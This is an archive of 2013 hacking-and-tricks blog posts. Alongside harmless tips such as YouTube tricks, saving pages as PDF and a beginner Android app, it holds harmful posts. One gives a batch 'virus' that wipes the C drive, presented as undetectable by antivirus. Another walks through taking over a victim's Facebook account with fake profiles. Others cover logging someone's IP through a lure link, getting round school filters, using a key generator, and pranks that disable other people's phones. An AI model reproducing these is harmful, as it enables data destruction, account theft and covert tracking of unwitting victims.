Sunday 29 December 2013

New Awesome Youtube Missile Game Trick

I had previously share cool youtube tricks like watching 18+ youtube videos without signing in or how to increase youtube seed without any software. Today i will share an amazing trick that i came across we will call it youtube missile trick. Since google is celebrating geek week it introduced this trick.



How To Do ?

   1. Open youtube and click on any video you would like to play
   2. Pause the video
   3. Now type 1980 and see the magic

Once you start this game missile will start coming from the top. The job of missile is to destroy the video. You can protect the video by firing back using your mouse.

Saturday 28 December 2013

How to Set a Video as Desktop Wallpaper

 Always wanted to set a video as wallpaper? Well, now you can using VLC Media Player. Follow the following instructions to set your favorite video as your desktop wallpaper:

·       Open VLC Media Player.
·       Open the video which you would like to set as your wallpaper
·       Click on Tools>Preferences (or just press Ctrl+P).


Click on Video.

Under ‘Output’, select DirectX (Direct Draw) video output.


  Save the preferences.

   After that, click on ‘Video’ and check ‘Set as Wallpaper’.



            You will now find that the video has been set as you wallpaper.
Note that the wallpaper will be set as the video as long as VLC Media Player is running. After closing VLC, a blank screen will appear as the wallpaper. To get back your previous wallpaper, just refresh your desktop once. Please leave your valuable comments below





Simple Trick To Convert A Webpage To PDF File

In this post i will teach a simple trick or browser feature that let you convert any web page into PSD file format, which might help you to read your favourite articles offline. So lets get started.

How To Save Web Page To PDF File ?

1. Open the Google Chrome Browser on your PC or MAC 
2. Then go to the web page that you want to convert as a PDF. 
3. Now press Ctrl+P on Windows PC or Command+P if you are on a Mac to Open the the Print dialog on Chrome Browser. 
4. Now Change the destination to “Save As PDF” and hit the save button.
5. The current web page will instantly be downloaded as a PDF document. 

Friday 13 December 2013

list of some good proxy site

 Below is the list of some good proxy site which you can use to surf anonymously on the internet . Even you can use this proxy sites to open block website in school or offices. For example you can use facebook if it is block at your school or office.

http://aniscartujo.com/webproxy 
http://www.badboysproxy.com 
http://www.surfscreened.com 
http://www.hagiomusic.info 
http://www.greenpips.info 
http://urlbrowse.com 
http://www.hideipaddress.net 
http://www.sneakfilter.com 
http://www.browsestealth.com 
http://www.sneak1.info 
http://proxiesrus.com 
http://www.surfindark.com 
http://www.navydog.com 
http://falsario.com 
http://www.proxypit.com 
http://www.proxypan.com 
http://myspacewebproxy.org/ 
http://www.allfreehere.info 
http://www.takefreely.info 
http://autobypass.com 
http://www.proxcity.info 
http://www.proxyzip.org 
http://www.cheekyproxy.com 
http://www.eggproxy.com
 http://www.theschoolcloak.com 
http://www.hidemefast.com 
http://browseanywhere.info 
http://www.404surf.com 
http://www.cloakip.net 
http://www.browsedark.com 
http://www.dartprox.com 
http://www.proxish.com 
http://www.surfsneak.com 
http://www.surfsneaky.com 
http://www.browsehidden.com 
http://www.filterhide.com 
http://www.browsesneak.com 
http://myspaceproxyy.com 
http://www.browsesneaky.com 
http://www.proxyz.us 
http://www.sneakschool.com 
http://www.iphide.com 
http://www.proogle.info 
http://greatproxy.info 
http://www.playnsurf.info 
http://www.realproxy.info 
http://aplusproxy.com 
http://www.ecoproxy.com 
http://freedom.webtuo.com 
http://www.slyuser.com/ 
http://tenpass.com 
http://pawxy.com 
http://pawxy.org 
http://logu.in

Monday 9 December 2013

Build your first Hello World Android app Tutorial 2

We continue our series on Android apps. This post will help you create your first basic  ’Hello Word’ Android app and run it.  This app will display “Hello World ! ” on your device/emulator. It is the simplest program available in any programming language. It is  traditionally used to help beginners with the most basic syntax of Android development . It is also used to verify that the environment you have set up on your system for Android development is operating correctly.
For developing an Android app on your PC or laptop, you need to set up an Android development environment on your computer. You can do that by following our first post in the series here.

Once you set up your android development environment. Follow these simple steps:

Step 1 : Open Eclipse from ADT bundle –>Eclipse folder.




While opening Eclipse, a pop-up window will ask for a workspace folder. Select the folder in your hard drive where you would like to store your Android application projects.

Step 2 : Create a new Android application project by selecting File –> New –> Android Application Project.


Step 3 : Fill in your Android project details

Give  the application a name such as ” My First Android App “.  This name will be displayed in the app menu once you install this app on an Android device or an emulator. Name the project “First App” and type in a  package name where you would like to store all your Java files.  Make sure that  you select a unique package name (example: startup.village or your firstname.lastname) and type it in lower case keys to adhere with the coding standards.


Step 4 : Locate the project folder and expand it 

Eclipse will now show the user interface of your app (Graphical Layout of activity_mail.xml) with a ” Hello World ” TextView widget right in the middle of it by default.  You can also see a newly created project folder in the package explorer window with the given project name. Expand that folder to view files.


Your Hello World App is almost ready to run but before going ahead let us take a look at the folders and files in your projects folder for a better understanding.


src  : The ‘src’ folder  or the source folder contains your package name and Java files are stored in it.
res  :  The “res” folder or the resource folder stores all your  user interface design xml files, images,sound, videos etc. that will be used in your app.
R.java  :  You can find R.java file in the gen folder. R.java is where you have access to anything you have in your resources folder.
AndroidManifest.xml : Android manifest contains essential information about the application, information the system must have before it can run any of the application’s code.


Step  5  : Run your app 

Run your app for the first time by clicking on the ” Run ” button and select Run As –> Android Application.  The Android virtual device (AVD/emulator) will automatically pop up and run the application in it.


In case you have not set up an Android device , you can do it by following our previous article. You can also connect your “USB Debugging” enabled android smartphone/tablet and install this app in it.


Please watch this space for more Android development tutorials. If you have any doubts regarding this post, you can post your queries in the comment section below and we will be happy to help you.









Sunday 8 December 2013

Dancing Keyboard Led


In this part i will show you to make interesting file using notepad which will make keyboard led to dance. basically we will be creating a visual basic script.

    1. Open Notepad and copy below codes into it.

Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"
wshshell.sendkeys "{NUMLOCK}"
wshshell.sendkeys "{SCROLLLOCK}"
loop
    2. Then save this file as dance.vbs (name can be anything but .vbs is must)
    3. Open your save file and see your keyboard led blinking like disco lights.

World Trade Center Attack Trick



The flight number of the plane that had hit World Trade Center on  (9/11) was Q33NY. Now we call this trick or a coincidence or something else but whatever it is you will be definitely amazed by the this trick. 

1. Open Notepad and Type “Q33N” (without quotes) in capital letters.     
2. Increase the font size to 72.     
3. Change the Font to Wingdings.

Trick to find facebook Profile ID

So this is the trick which will let you get profile id of any person who got custom username. Check below image and see how URL of  facebook profile looks before and after custom username.

In case of Profile ID before custom username you can easily identify it by looking at Profile URL, But in case of profile with custom username its not same. Below are simple steps to find Profile ID having custom username.
Go to the profile you want to find Profile ID
That URL will look like this www.facebook.com/username
Change that URL to graph.facebook.com/username
Then you will get something like below image.



Friday 6 December 2013

Learn To Make Dangerous Virus In A Minute

In this post i will teach you to make simple yet very power full or you can say harm full computer virus using a batch file. No software is required to make this virus, Notepad is enough for it. The good thing about this virus is it is not detected by any Anti-virus.



What will this virus do ?  

You will create this virus using batch file programming. This virus will delete the C Drive completely. The good thing about this virus is that it is not detected by antivirus.

How to Make the virus ?

   1. Open Notepad and copy below code into it.

@Echo off
Del C:\ *.* |y

   2. Save this file as virus.bat (Name can be anything but .bat is must)
   3. Now, running this file will delete all the content of C Drive.


Warning: Please don't try to run on your own computer or else it will delete all the content of your C Drive. I will not be responsible for any damage done to your computer.

Thursday 5 December 2013

How To Watch 18+ Youtube Videos Without Logging In ?


Sometime its annoying when youtube ask you to sign in for your age verification to watch 18+ videos. So i will make it easy for you by showing you a simple youtube trick to watch adult or 18+ youtube videos without signing In. This trick is 100% working as of 2013. So lets get started. 



1. First get the Url of video you want to watch. As shown below.

http://www.youtube.com/watch?v=4Xkh6j7RMqk 


2. Then copy the Video Id. For above link video Id is 4Xkh6j7RMqk


3. Now paste the Video Id in the link given below.

http://www.youtube.com/v/VideoId?fs=1
Replace VideoId with the Id you copied in Step 2


4. Now the url will become as shown below.
http://www.youtube.com/v/4Xkh6j7RMqk?fs=1


5. Done.


How To View Facebook Private Profile Photo In Large Size



Sometime you want to see clear image of someone on facebook who might not be your friend but his/her privacy setting stop you from doing this. In this tutorial i will teach you to view facebook private  or locked profile picture in large size with very simple trick.

How To View Facebook Locked Profile Picture ?

1. Open the facebook profile of person whose profile picture is locked or is set to private.
2. Right click on the profile picture and click on Copy Image Url as shown in image below


3. Open that image in new tab by  right clicking and selecting Paste (CTRL + V)
4. Now change the value of image size highlighted below which might be s160x160 to s720x720 (If its not clear try (s320x320)




5. The image will enlarge in size. This trick does not always work.





.

How To Clean Your Facebook Search History

The social network stores every single term you enter in the search box. Although the privacy setting for this data is set to “only you,” you may feel uncomfortable having that info hanging around. If so, it’s a simple process to delete it and clear your creeper Facebook search history. 

1. Go to Your Profile Head to your Facebook profile and click the “Activity log” option at the bottom right of your cover photo.




2. Activity Log Your activity log is a list of your posts and all Facebook activity, including your search history. 



3. More Options Next, click on the “More” option on the left-hand menu, under “Photos,” “Likes” and “Comments.”


4. Search Activity Scroll down the expanded list until you see “Search.” 




5. Your Search History You can now view your Facebook search history, in date order. To get rid of it, simply click “Clear Searches…”



6. Clear Your History …And then okay the pop-up message that appears.




7. A Clean Search Slate Your Facebook search history is now a clean slate! 





Wednesday 4 December 2013

Top 10 Password Crackers

1. Cain and Abel : The top password recovery tool for Windows

UNIX users often smugly assert that the best free security tools support their platform first, and Windows ports are often an afterthought. They are usually right, but Cain & Abel is a glaring exception. This Windows-only password recovery tool handles an enormous variety of tasks. It can recover passwords by sniffing the network, cracking encrypted passwords using Dictionary, Brute-Force and Cryptanalysis attacks, recording VoIP conversations, decoding scrambled passwords, revealing password boxes, uncovering cached passwords and analyzing routing protocols


2. John the Ripper : A powerful, flexible, and fast multi-platform password hash cracker

John the Ripper is a fast password cracker, currently available for many flavors of Unix (11 are officially supported, not counting different architectures), DOS, Win32, BeOS, and OpenVMS. Its primary purpose is to detect weak Unix passwords. It supports several crypt(3) password hash types which are most commonly found on various Unix flavors, as well as Kerberos AFS and Windows NT/2000/XP LM hashes

3. THC Hydra :
 A Fast network authentication cracker which support many different services

When you need to brute force crack a remote authentication service, Hydra is often the tool of choice. It can perform rapid dictionary attacks against more then 30 protocols, including telnet, ftp, http, https, smb, several databases, and much more

4. Aircrack : The fastest available WEP/WPA cracking tool

Aircrack is a suite of tools for 802.11a/b/g WEP and WPA cracking. It can recover a 40 through 512-bit WEP key once enough encrypted packets have been gathered. It can also attack WPA 1 or 2 networks using advanced cryptographic methods or by brute force. The suite includes airodump (an 802.11 packet capture program), aireplay (an 802.11 packet injection program), aircrack (static WEP and WPA-PSK cracking), and airdecap (decrypts WEP/WPA capture files)

5. L0phtcrack :
 Windows password auditing and recovery application

L0phtCrack, also known as LC5, attempts to crack Windows passwords from hashes which it can obtain (given proper access) from stand-alone Windows NT/2000 workstations, networked servers, primary domain controllers, or Active Directory. In some cases it can sniff the hashes off the wire. It also has numerous methods of generating password guesses (dictionary, brute force, etc). LC5 was discontinued by Symantec in 2006, but you can still find the LC5 installer floating around. The free trial only lasts 15 days, and Symantec won't sell you a key, so you'll either have to cease using it or find a key generator. Since it is no longer maintained, you are probably better off trying Cain and Abel, John the Ripper, or Ophcrack instead.

6. Airsnort : 802.11 WEP Encryption Cracking Tool

AirSnort is a wireless LAN (WLAN) tool that recovers encryption keys. It was developed by the Shmoo Group and operates by passively monitoring transmissions, computing the encryption key when enough packets have been gathered. You may also be interested in the similar Aircrack.

7. SolarWinds : A plethora of network discovery/monitoring/attack tools

SolarWinds has created and sells dozens of special-purpose tools targeted at systems administrators. Security-related tools include many network discovery scanners, an SNMP brute-force cracker, router password decryption, a TCP connection reset program, one of the fastest and easiest router config download/upload applications available and more.


8. Pwdump : A window password recovery tool

Pwdump is able to extract NTLM and LanMan hashes from a Windows target, regardless of whether Syskey is enabled. It is also capable of displaying password histories if they are available. It outputs the data in L0phtcrack-compatible form, and can write to an output file.


9. RainbowCrack : 
An Innovative Password Hash Cracker

The RainbowCrack tool is a hash cracker that makes use of a large-scale time-memory trade-off. A traditional brute force cracker tries all possible plaintexts one by one, which can be time consuming for complex passwords. RainbowCrack uses a time-memory trade-off to do all the cracking-time computation in advance and store the results in so-called "rainbow tables". It does take a long time to precompute the tables but RainbowCrack can be hundreds of times faster than a brute force cracker once the precomputation is finished.


10 Brutus : A network brute-force authentication cracker

This Windows-only cracker bangs against network services of remote systems trying to guess passwords by using a dictionary and permutations thereof. It supports HTTP, POP3, FTP, SMB, TELNET, IMAP, NTP, and more. No source code is available. UNIX users should take a look at THC Hydra.

How to Hack Facebook Passwords by adding into friend list

These days many Facebook users have hundreds and possibly thousands of friends. More friends increase the chance that your Facebook account will be hacked – especially if you accept friend requests from people you do not know.




Critical vulnerability found on FACEBOOK


It isn’t entirely unusual that Facebook users receive friend requests from people they do not know. Often, those friend requests are blindly accepted in an effort to grow the friendship base. It seems that especially people with Facebook accounts that are primarily used for marketing purposes are more likely to accept friend requests from people they do not know than the typical Facebook user does.

Such accounts could be hacked easily, and there is no ingenious hacking talent required to do so: You simply need to walk through Facebook’s passwork recovery process with two other Facebook friends of a targeted account.

You can easily gain access to a your friends Facebook account through a collusion approach. You have to use Facebook’s password recovery feature, which is accessible through the“Forgot your password?” link on the Facebook login page.

Once identified the Friend, Facebook suggested to recover the password via the existing email address. However, you can bypass this hurdle by clicking the “No longer have access to these?” link. In that case, Facebook asks for a new email address. In the following step, Facebook presents the security question tied to the account. However, you can also to bypass the question by typing wrong answers three times in a row. After that, Facebook provides a rather surprising way to get your account back – via the support of three friends.


1. First, you select three friends “you trust”. These three friends then receive a code, which is required to change the account password.

2. Select yourself and immediately received a code from Facebook. With those three codes, you can easily change the password for the targeted account.

3. The problem clearly is that three friends you do not really know and cannot trust could potentially gain access to the victim Facebook account – through the standard password recovery feature.

4. To bypass problem mentioned in step 3Create your own 2 more fake profiles and add the victim as a friend on facebook. Now get all the 3 codes and you are done.

NOTE: The targeted account will be locked for 24 hours after this password change and the user’s old email address receives a notification of the password change as well as the names of the three friends who were given the codes. However, if these are friends with fake names, it doesn’t quite matter that you now know their names.

Now if a Facebook user could in fact be in a situation when a Facebook account is not checked within a 24-hour period, particularly since we enjoy to flaunt our activities through Facebook status messages. And if the account is checked frequently, the account depends on Facebook’s response time, which can easily stretch to a number of days.

Bottom line is You don’t expose yourself to people you don’t know.

Tuesday 3 December 2013

Get Someone's IP Through AIM/MSN/Chat/Facebook



1)Create an Account in
http://www.chatrack.frihost.net/index-1.php

2)Get one of the links and tell someone on AIM or whatever to click it, choose any of the images and tell them you painted it or some stupid things like that.

3)When they look at the image, it logs their IP.

4)Bonus points:
-Tell them its animated and 20 seconds in it will change, this allows the website to have time to ensure all their info is retrieved.

Nokia Phone Secrets

First things first, Nokia is a worldwide Corporation which owns 36% of the market share. So no doubt alot of you own a Nokia mobile, whether it be CDMA or GSM.

CDMA : Is a phone which does not need a sim card to run, it just stores everything on the phone.
GSM : Is a phone which has a SIM card (like Vodafone)

There are several codes that you can use on Nokia's, i will run through these in this article.
(Stand-by mode is the main/home screen which displays your battery charge and signal)

----------------------------------------------------------------------------------------------


----------------------------------------------------------------------------------------------

1. Service Programming Menu - *3001#12345#

(NOTE: The Service Programming Menu only works on CDMA phones)
This menu is the mother of all Nokia codes, you can edit your phone like mad here, most of these menus your service provider probably doesn't want you to have the ability to do. So here we go.

On stand-by mode, type in *3001#12345# and wait a few seconds for it to load up. Once the screen comes up you will have several options, all with different functions. (NOTE: this menu differs on different phones.)

1. NAM 1
2. Change SPC
3. Security
4. Server addr.
5. SW version
6. Serial number
7. Programmed
8. Field test

----------------------------------------------------------------------------------------------

1. NAM 1 (* means explained below)

This is the most useful menu your phone has, it allows you to edit the heck out of your phone! inside NAM 1 there are these different menus:

Own number*
Mobile ID number
A-key code
Alpha tag*
Emergency*
Service No.
CDMA settings
NAM status

Own number:
Self explanitory, but if you want a new number then this is where you want to go. Just enter this menu followed by the SPC (see Change SPC) then change your number. This DOES work, but the new phone number you want must not already be in use.

Alpha tag:
You know on the standby screen, there's the "Vodafone" or "Telecom" or "T-Mobile" that appears? well now you can get rid of that annoying tag. Change this to whatever you please, just to make your phone more personalised.

Emergency:
This menu is basically a menu which displays all the numbers that will divert to the emergency number of your area. For example, if you live in USA and your emergency number is 911, in this menu there will be "911","811", "991" and the obvious numbers that you may type in while trying to reach 911. It's smart not to mess with these, because you never know when you'll be in an emergency. There should be some free slots so why not add in a couple more numbers that you want to divert to your emergency?
Some people think "Wow! emergency number! that calls for free, so maybe if i put in my friends number then it will give me free calls to him/her!" WRONG. This menu can NOT give you free calls. If you were to put in your friends number, then whenever you called them you would end up calling the emergency line - as that's what you're diverted to! REMEMBER THIS!

----------------------------------------------------------------------------------------------

2. Change SPC

The SPC is the Service Programming Code. This code is rather hard to come across, as the service providers try to hide it from the public so they can't access these places on their phones. But luckily enough if you live in New Zealand then here is the code :)

147359 - Is the default code that will let you into 'almost' anything
665*** - Is the 'master' code, that will let you into anything you like.

(The *** is the last 3 digits of your Nokia model, for example: If your Nokia was model number '8734', then your master code will be '665734'. The 665 is the default number for the Nokia company.)

So, this menu just means you can change the code. NOTE: Some mean stores when you buy the phone tend to access this menu and change it so that the owner can't access it :( that is not always the case though, so try it out!

----------------------------------------------------------------------------------------------

3. Security

This menu just shows you the security code that is installed on your phone, couldn't be more bland.
FUN TRICK: why not have a look at your friend/work mates' phone and access this menu, you could then see their security code or change it just for fun :) But we're nice people and that's naughty, so we arn't going to do that are we..

----------------------------------------------------------------------------------------------

4. Server addr.

This is the server address of your service provider. Nothing you can do here.

----------------------------------------------------------------------------------------------

5. SW version

Once again, another menu with not alot of meaning. All you can do in here is check out when your phone was activated, and what version software it is running. This can also be accessed on GSM phones (see below)

----------------------------------------------------------------------------------------------

6. Serial number

This is your serial number. DUH.
It would be a wise idea to jot this down somewhere safe, because this could be useful. If your phone was ever lost or stolen then you could contact your service provider and give them this code. This would let them shut the phone down so that your robber couldn't use your phone - or access anything on it for that matter.

----------------------------------------------------------------------------------------------

7. Programmed

This is just a menu that you can only access once, which lets you type in when your phone was programmed.

Seem like the menus are getting lamer? Wait for the next one..

----------------------------------------------------------------------------------------------

8. Field Test

This is an option which is quite cool really. Go into Field test and change "Disabled" to "Enabled". Then get out of the whole service programming menu.
Now, turn your phone off, and back on again.
Once it loads up go to your normal menu and scroll to the bottom. Notice you have just added a new menu to your phone? It is called Net Monitor.
Net Monitor speaks for itself, with this option you can monitor your network to a small extent.
Enter Net Monitor and it will prompt you with "Group/display:" enter in 3101 and press OK.
It should take you back to your standby screen, nothing will have changed. But wait a few seconds and then all these numbers will appear on your screen. What do they mean?

There is only one number you can really understand in this menu. This number is located as the third number down, it will say something like "-50" (the 50 can range anywhere from 10 to 99). This is how strong the signal is.

For example : If your phone displayed -10 here then it's telling you that your neighbour is a cell site and your signal is really really good.

If your phone displayed -90 then it's basically telling you that where you live or where you are at that certain time has really bad signal.

You will notice that as you get closer/further away to a cell site this number will grow or decrease.

----------------------------------------------------------------------------------------------

That sums up the Service Programming Menu, and the extra things your service provider doesn't want you doing :}

There are many other codes that you can use on CDMA phones, just search around for them.

Extra Codes:

*#66767# - This code when spelt out is "NO-SMS", so shouldn't that mean no texting? well, yes. If you enter this code in on your phone then you will no longer have the ability to "Create Message" or "Reply". If you're really mean then enter it on your brother or sisters phone, that's sure to give you some laughs. You can bring them back again by re-entering the code.

*#639# - This brings you to the menu which just re-programs your phone faster. I wouldn't reccomend you doing this if you value your phone.

*#7780# - This takes you to a menu which says "Restore Factory Settings", i think you understand what will happen if you press yes :p

GSM Code:

This is the only GSM code i know from the top of my head, just search around for more as I'm sure they're out there.

*#0000# - This is probably the most useless code you can find, but anyway it just gives you information on when your phone was activated. If your phone was sent in for repair, then this date will have changed to the date when it was fixed.